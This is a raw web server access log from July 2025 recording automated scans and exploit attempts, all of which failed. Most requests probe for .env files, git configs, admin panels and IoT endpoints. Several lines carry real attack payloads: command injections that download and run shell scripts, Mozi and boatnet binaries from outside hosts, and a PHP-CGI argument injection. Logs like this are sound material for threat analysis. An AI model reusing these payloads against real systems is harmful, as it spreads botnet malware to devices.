185.242.226.99 - - [06/Jul/2025:00:03:51 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:00:10:25 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
89.42.231.140 - - [06/Jul/2025:00:57:00 +0300] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [06/Jul/2025:01:05:11 +0300] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [06/Jul/2025:01:05:11 +0300] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [06/Jul/2025:01:05:12 +0300] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [06/Jul/2025:01:06:03 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:02:06:27 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
79.119.240.39 - - [06/Jul/2025:02:42:59 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
165.22.228.146 - - [06/Jul/2025:02:51:42 +0300] "GET /form.html HTTP/1.1" 404 9 "{}"
165.22.228.146 - - [06/Jul/2025:02:51:43 +0300] "GET /t4 HTTP/1.1" 404 9 "{}"
165.22.228.146 - - [06/Jul/2025:02:51:44 +0300] "GET /geoip/ HTTP/1.1" 404 9 "{}"
165.22.228.146 - - [06/Jul/2025:02:51:44 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
198.55.98.76 - - [06/Jul/2025:02:52:28 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:04:05:17 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
20.65.193.121 - - [06/Jul/2025:05:18:30 +0300] "GET /portal/redlion HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [06/Jul/2025:05:27:56 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
164.92.191.35 - - [06/Jul/2025:05:35:46 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
89.248.168.227 - - [06/Jul/2025:05:44:26 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
176.65.148.183 - - [06/Jul/2025:05:51:18 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
164.92.191.35 - - [06/Jul/2025:05:53:02 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
196.251.84.146 - - [06/Jul/2025:05:56:55 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:06:03:16 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
160.250.180.19 - - [06/Jul/2025:06:26:15 +0300] "POST /boaform/admin/formLogin HTTP/1.1" 404 9 "{}"
27.0.216.6 - - [06/Jul/2025:06:53:27 +0300] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:07:55:30 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
154.126.201.150 - - [06/Jul/2025:08:52:07 +0300] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 9 "{}"
201.7.170.246 - - [06/Jul/2025:08:55:08 +0300] "GET /admin/assets/css/jquery-ui.css HTTP/1.0" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:09:54:00 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
167.99.93.212 - - [06/Jul/2025:11:32:05 +0300] "GET /aaa9 HTTP/1.1" 404 9 "{}"
167.99.93.212 - - [06/Jul/2025:11:32:18 +0300] "GET /aab8 HTTP/1.1" 404 9 "{}"
165.227.62.178 - - [06/Jul/2025:11:48:23 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
165.227.62.178 - - [06/Jul/2025:11:48:23 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:11:57:39 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
79.119.240.39 - - [06/Jul/2025:12:17:08 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
38.252.230.83 - - [06/Jul/2025:12:18:35 +0300] "GET /admin/ HTTP/1.1" 404 9 "{}"
138.84.36.140 - - [06/Jul/2025:12:18:37 +0300] "GET /login/ HTTP/1.1" 404 9 "{}"
190.167.84.20 - - [06/Jul/2025:12:18:39 +0300] "GET /dashboard/ HTTP/1.1" 404 9 "{}"
190.167.84.20 - - [06/Jul/2025:12:18:41 +0300] "GET /panel/ HTTP/1.1" 404 9 "{}"
5.250.187.42 - - [06/Jul/2025:13:35:37 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
5.250.187.42 - - [06/Jul/2025:13:35:37 +0300] "POST / HTTP/1.1" 400 11 "{}"
95.214.53.84 - - [06/Jul/2025:13:50:05 +0300] "GET /page/style/index.css HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:13:59:47 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
164.90.217.200 - - [06/Jul/2025:14:10:06 +0300] "GET /t4 HTTP/1.1" 404 9 "{}"
164.90.217.200 - - [06/Jul/2025:14:10:06 +0300] "GET /geoip/ HTTP/1.1" 404 9 "{}"
164.90.217.200 - - [06/Jul/2025:14:10:06 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
164.90.217.200 - - [06/Jul/2025:14:10:07 +0300] "GET /form.html HTTP/1.1" 404 9 "{}"
196.251.88.60 - - [06/Jul/2025:14:25:24 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
143.198.177.78 - - [06/Jul/2025:14:51:22 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
143.198.177.78 - - [06/Jul/2025:14:51:24 +0300] "GET /form.html HTTP/1.1" 404 9 "{}"
143.198.177.78 - - [06/Jul/2025:14:51:24 +0300] "GET /t4 HTTP/1.1" 404 9 "{}"
143.198.177.78 - - [06/Jul/2025:14:51:25 +0300] "GET /geoip/ HTTP/1.1" 404 9 "{}"
141.76.94.18 - - [06/Jul/2025:15:11:36 +0300] "GET http://141.76.94.18:80/pscan HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:16:09:01 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [06/Jul/2025:16:11:13 +0300] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 9 "{}"
5.79.105.22 - - [06/Jul/2025:16:56:03 +0300] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F5.79.105.22%2Ftbk.sh%3B%20chmod%20777%20tbk.sh%3B%20sh%20tbk.sh%3B%20tftp%205.79.105.22%20-c%20get%20tbk1.sh%3B%20chmod%20777%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20tftp%20-r%20tbk2.sh%20-g%205.79.105.22%3B%20chmod%20777%20tbk2.sh%3B%20sh%20tbk2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%205.79.105.22%20tbk1.sh%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20rm%20-rf%20tbk.sh%20tbk1.sh%20tbk2.sh%20tbk1.sh HTTP/1.1" 404 9 "{}"
196.251.81.115 - - [06/Jul/2025:17:06:26 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
167.94.146.58 - - [06/Jul/2025:17:23:36 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
167.94.146.58 - - [06/Jul/2025:17:23:36 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
64.62.197.175 - - [06/Jul/2025:17:49:45 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
64.62.197.167 - - [06/Jul/2025:17:50:24 +0300] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:18:24:09 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.79.105.22 - - [06/Jul/2025:18:41:59 +0300] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F5.79.105.22%2Ftbk.sh%3B%20chmod%20777%20tbk.sh%3B%20sh%20tbk.sh%3B%20tftp%205.79.105.22%20-c%20get%20tbk1.sh%3B%20chmod%20777%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20tftp%20-r%20tbk2.sh%20-g%205.79.105.22%3B%20chmod%20777%20tbk2.sh%3B%20sh%20tbk2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%205.79.105.22%20tbk1.sh%20tbk1.sh%3B%20sh%20tbk1.sh%3B%20rm%20-rf%20tbk.sh%20tbk1.sh%20tbk2.sh%20tbk1.sh HTTP/1.1" 404 9 "{}"
79.119.240.39 - - [06/Jul/2025:18:49:45 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [06/Jul/2025:19:12:31 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
220.198.241.156 - - [06/Jul/2025:19:19:08 +0300] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 9 "{}"
154.126.201.150 - - [06/Jul/2025:19:34:30 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
102.223.208.49 - - [06/Jul/2025:19:37:59 +0300] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
135.237.123.227 - - [06/Jul/2025:20:17:09 +0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
141.76.94.18 - - [06/Jul/2025:20:56:07 +0300] "GET http://141.76.94.18:80/pscan HTTP/1.1" 404 9 "{}"
207.167.67.14 - - [06/Jul/2025:20:59:24 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
206.168.34.52 - - [06/Jul/2025:21:15:42 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
206.168.34.52 - - [06/Jul/2025:21:15:52 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [06/Jul/2025:21:42:12 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:21:45:37 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
178.128.27.51 - - [06/Jul/2025:22:30:50 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
178.128.27.51 - - [06/Jul/2025:22:30:50 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [06/Jul/2025:23:11:32 +0300] "GET /admin/assets/css/jquery-ui.css HTTP/1.0" 404 9 "{}"
193.174.89.19 - - [06/Jul/2025:23:14:26 +0300] "GET /connector.sds HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [06/Jul/2025:23:47:51 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [07/Jul/2025:01:15:11 +0300] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [07/Jul/2025:01:15:11 +0300] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [07/Jul/2025:01:15:12 +0300] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [07/Jul/2025:01:16:09 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
179.87.82.196 - - [07/Jul/2025:01:28:00 +0300] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 9 "{}"
138.197.212.73 - - [07/Jul/2025:02:44:12 +0300] "GET /form.html HTTP/1.1" 404 9 "{}"
138.197.212.73 - - [07/Jul/2025:02:44:12 +0300] "GET /t4 HTTP/1.1" 404 9 "{}"
138.197.212.73 - - [07/Jul/2025:02:44:12 +0300] "GET /geoip/ HTTP/1.1" 404 9 "{}"
138.197.212.73 - - [07/Jul/2025:02:44:15 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [07/Jul/2025:03:05:56 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
81.29.134.51 - - [07/Jul/2025:03:31:09 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
13.89.125.224 - - [07/Jul/2025:04:20:48 +0300] "GET /druid/index.html HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [07/Jul/2025:06:10:32 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
89.42.231.140 - - [07/Jul/2025:06:17:03 +0300] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [07/Jul/2025:06:20:42 +0300] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 9 "{}"
45.82.78.254 - - [07/Jul/2025:07:20:01 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
80.82.77.202 - - [07/Jul/2025:08:04:26 +0300] "GET /aaa9 HTTP/1.1" 404 9 "{}"
80.82.77.202 - - [07/Jul/2025:08:04:26 +0300] "GET /aab9 HTTP/1.1" 404 9 "{}"
104.234.115.35 - - [07/Jul/2025:08:14:12 +0300] "GET /login.html HTTP/1.1" 404 9 "{}"
104.234.115.35 - - [07/Jul/2025:08:14:20 +0300] "GET /login.jsp HTTP/1.1" 404 9 "{}"
104.234.115.35 - - [07/Jul/2025:08:14:38 +0300] "GET /remote/login HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [07/Jul/2025:09:31:08 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [07/Jul/2025:11:38:46 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [07/Jul/2025:12:03:07 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
167.71.191.116 - - [07/Jul/2025:12:14:46 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
167.71.191.116 - - [07/Jul/2025:12:14:46 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
65.49.1.219 - - [07/Jul/2025:12:50:37 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
65.49.1.212 - - [07/Jul/2025:12:51:48 +0300] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
79.118.66.65 - - [07/Jul/2025:13:02:56 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [07/Jul/2025:13:45:35 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
193.174.89.19 - - [07/Jul/2025:13:49:59 +0300] "GET /connector.sds HTTP/1.1" 404 9 "{}"
196.251.117.9 - - [07/Jul/2025:14:44:27 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
141.76.94.18 - - [07/Jul/2025:15:04:04 +0300] "GET http://141.76.94.18:80/pscan HTTP/1.1" 404 9 "{}"
185.148.1.243 - - [07/Jul/2025:15:25:26 +0300] "GET /.svn/wc.db HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [07/Jul/2025:15:48:30 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.53.84 - - [07/Jul/2025:16:40:56 +0300] "GET /login.asp HTTP/1.1" 404 9 "{}"
111.250.114.7 - - [07/Jul/2025:16:58:10 +0300] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
111.250.114.7 - - [07/Jul/2025:16:59:23 +0300] "GET /containers/json HTTP/1.1" 404 9 "{}"
95.214.53.84 - - [07/Jul/2025:17:45:52 +0300] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [07/Jul/2025:17:56:10 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
35.246.197.59 - - [07/Jul/2025:19:17:06 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
185.53.198.149 - - [07/Jul/2025:19:27:06 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [07/Jul/2025:21:33:44 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
206.168.34.50 - - [07/Jul/2025:21:47:41 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
206.168.34.50 - - [07/Jul/2025:21:47:46 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
100.104.10.46 - - [07/Jul/2025:21:50:21 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
206.168.34.36 - - [07/Jul/2025:21:51:27 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
206.168.34.36 - - [07/Jul/2025:21:51:30 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [07/Jul/2025:21:56:14 +0300] "GET /admin/assets/css/jquery-ui.css HTTP/1.0" 404 9 "{}"
144.172.97.96 - - [07/Jul/2025:22:48:09 +0300] "POST /boaform/admin/formLogin HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [07/Jul/2025:23:41:33 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
20.163.14.222 - - [07/Jul/2025:23:47:23 +0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
144.172.115.127 - - [08/Jul/2025:00:21:56 +0300] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.7%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1" 404 9 "{}"
165.232.95.101 - - [08/Jul/2025:00:24:53 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
165.232.95.101 - - [08/Jul/2025:00:24:53 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
195.182.25.114 - - [08/Jul/2025:01:09:13 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
147.182.159.203 - - [08/Jul/2025:01:10:14 +0300] "GET /form.html HTTP/1.1" 404 9 "{}"
147.182.159.203 - - [08/Jul/2025:01:10:14 +0300] "GET /t4 HTTP/1.1" 404 9 "{}"
147.182.159.203 - - [08/Jul/2025:01:10:14 +0300] "GET /geoip/ HTTP/1.1" 404 9 "{}"
147.182.159.203 - - [08/Jul/2025:01:10:15 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [08/Jul/2025:01:25:14 +0300] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [08/Jul/2025:01:25:14 +0300] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [08/Jul/2025:01:25:16 +0300] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [08/Jul/2025:01:25:16 +0300] "POST /boaform/admin/formPing HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [08/Jul/2025:01:26:06 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [08/Jul/2025:01:45:15 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
111.113.88.38 - - [08/Jul/2025:02:21:31 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
95.214.53.84 - - [08/Jul/2025:02:40:23 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [08/Jul/2025:03:40:11 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [08/Jul/2025:04:25:14 +0300] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 9 "{}"
89.248.168.227 - - [08/Jul/2025:04:45:00 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
172.235.181.217 - - [08/Jul/2025:07:31:05 +0300] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 9 "{}"
172.235.181.217 - - [08/Jul/2025:07:31:11 +0300] "GET /devicedesc.xml HTTP/1.1" 404 9 "{}"
172.235.181.217 - - [08/Jul/2025:07:31:17 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [08/Jul/2025:07:31:42 +0300] "GET /admin/assets/css/jquery-ui.css HTTP/1.0" 404 9 "{}"
196.251.70.87 - - [08/Jul/2025:07:47:52 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
65.49.1.97 - - [08/Jul/2025:09:03:13 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
65.49.1.94 - - [08/Jul/2025:09:04:16 +0300] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
180.149.125.173 - - [08/Jul/2025:09:24:48 +0300] "GET /c/ HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [08/Jul/2025:11:00:55 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
78.153.140.224 - - [08/Jul/2025:11:21:50 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
78.153.140.224 - - [08/Jul/2025:11:21:50 +0300] "GET /api/.env HTTP/1.1" 404 9 "{}"
78.153.140.224 - - [08/Jul/2025:11:21:50 +0300] "GET /backend/.env HTTP/1.1" 404 9 "{}"
78.153.140.224 - - [08/Jul/2025:11:21:51 +0300] "GET /admin/.env HTTP/1.1" 404 9 "{}"
78.153.140.224 - - [08/Jul/2025:11:21:51 +0300] "GET /.env.example HTTP/1.1" 404 9 "{}"
78.153.140.224 - - [08/Jul/2025:11:21:51 +0300] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 9 "{}"
164.92.201.253 - - [08/Jul/2025:11:27:28 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [08/Jul/2025:12:06:56 +0300] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 9 "{}"
78.153.140.179 - - [08/Jul/2025:13:19:47 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
196.251.83.236 - - [08/Jul/2025:13:21:29 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [08/Jul/2025:13:42:56 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
46.101.1.42 - - [08/Jul/2025:13:44:52 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
46.101.1.42 - - [08/Jul/2025:13:44:52 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
100.104.10.46 - - [08/Jul/2025:14:22:48 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [08/Jul/2025:14:32:24 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
144.172.115.127 - - [08/Jul/2025:15:06:17 +0300] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.86%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1" 404 9 "{}"
195.182.25.114 - - [08/Jul/2025:15:30:49 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
103.120.189.74 - - [08/Jul/2025:15:58:33 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
138.68.165.109 - - [08/Jul/2025:16:23:24 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [08/Jul/2025:16:35:32 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
45.82.78.254 - - [08/Jul/2025:16:42:19 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [08/Jul/2025:19:08:37 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [08/Jul/2025:19:25:32 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
209.97.171.55 - - [08/Jul/2025:20:12:27 +0300] "POST / HTTP/1.1" 400 11 "{}"
209.97.171.55 - - [08/Jul/2025:20:12:42 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [08/Jul/2025:21:18:44 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
52.188.189.7 - - [08/Jul/2025:21:19:57 +0300] "GET /actuator/health HTTP/1.1" 404 9 "{}"
103.120.189.74 - - [08/Jul/2025:21:33:54 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [08/Jul/2025:21:48:31 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
91.196.152.225 - - [08/Jul/2025:22:34:52 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
46.101.233.212 - - [08/Jul/2025:22:35:15 +0300] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 9 "{}"
46.101.233.212 - - [08/Jul/2025:22:35:22 +0300] "GET /odinhttpcall1752003320 HTTP/1.1" 404 9 "{}"
46.101.233.212 - - [08/Jul/2025:22:35:22 +0300] "POST /sdk HTTP/1.1" 404 9 "{}"
46.101.233.212 - - [08/Jul/2025:22:35:22 +0300] "GET /HNAP1 HTTP/1.1" 404 9 "{}"
46.101.233.212 - - [08/Jul/2025:22:35:22 +0300] "GET /evox/about HTTP/1.1" 404 9 "{}"
68.183.210.234 - - [08/Jul/2025:22:35:22 +0300] "GET /solr/admin/info/system HTTP/1.1" 404 9 "{}"
68.183.210.234 - - [08/Jul/2025:22:35:22 +0300] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 9 "{}"
104.248.246.206 - - [08/Jul/2025:22:35:22 +0300] "GET /v2/_catalog HTTP/1.1" 404 9 "{}"
68.183.210.234 - - [08/Jul/2025:22:35:22 +0300] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 9 "{}"
152.42.234.64 - - [08/Jul/2025:22:35:23 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
152.42.234.64 - - [08/Jul/2025:22:35:23 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
167.94.138.45 - - [08/Jul/2025:22:47:28 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
167.94.138.45 - - [08/Jul/2025:22:47:45 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
164.92.231.170 - - [08/Jul/2025:23:44:48 +0300] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 9 "{}"
164.92.231.170 - - [08/Jul/2025:23:44:55 +0300] "GET /odinhttpcall1752007493 HTTP/1.1" 404 9 "{}"
164.92.231.170 - - [08/Jul/2025:23:44:55 +0300] "POST /sdk HTTP/1.1" 404 9 "{}"
164.92.231.170 - - [08/Jul/2025:23:44:55 +0300] "GET /evox/about HTTP/1.1" 404 9 "{}"
164.92.231.170 - - [08/Jul/2025:23:44:55 +0300] "GET /HNAP1 HTTP/1.1" 404 9 "{}"
207.154.197.192 - - [08/Jul/2025:23:44:55 +0300] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 9 "{}"
165.22.92.225 - - [08/Jul/2025:23:44:55 +0300] "GET /solr/admin/info/system HTTP/1.1" 404 9 "{}"
165.227.143.111 - - [08/Jul/2025:23:44:55 +0300] "GET /v2/_catalog HTTP/1.1" 404 9 "{}"
165.22.92.225 - - [08/Jul/2025:23:44:55 +0300] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 9 "{}"
139.59.115.251 - - [08/Jul/2025:23:44:56 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
139.59.115.251 - - [08/Jul/2025:23:44:56 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [09/Jul/2025:00:04:23 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
164.90.194.104 - - [09/Jul/2025:00:07:56 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
167.99.244.182 - - [09/Jul/2025:00:32:04 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
167.99.244.182 - - [09/Jul/2025:00:32:04 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
196.251.70.87 - - [09/Jul/2025:01:26:48 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [09/Jul/2025:01:35:11 +0300] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [09/Jul/2025:01:35:11 +0300] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [09/Jul/2025:01:35:12 +0300] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
35.246.197.59 - - [09/Jul/2025:01:36:07 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
74.235.100.212 - - [09/Jul/2025:01:41:10 +0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
118.26.36.171 - - [09/Jul/2025:01:48:17 +0300] "GET /version HTTP/1.1" 404 9 "{}"
118.26.36.171 - - [09/Jul/2025:01:48:19 +0300] "GET /v1 HTTP/1.1" 404 9 "{}"
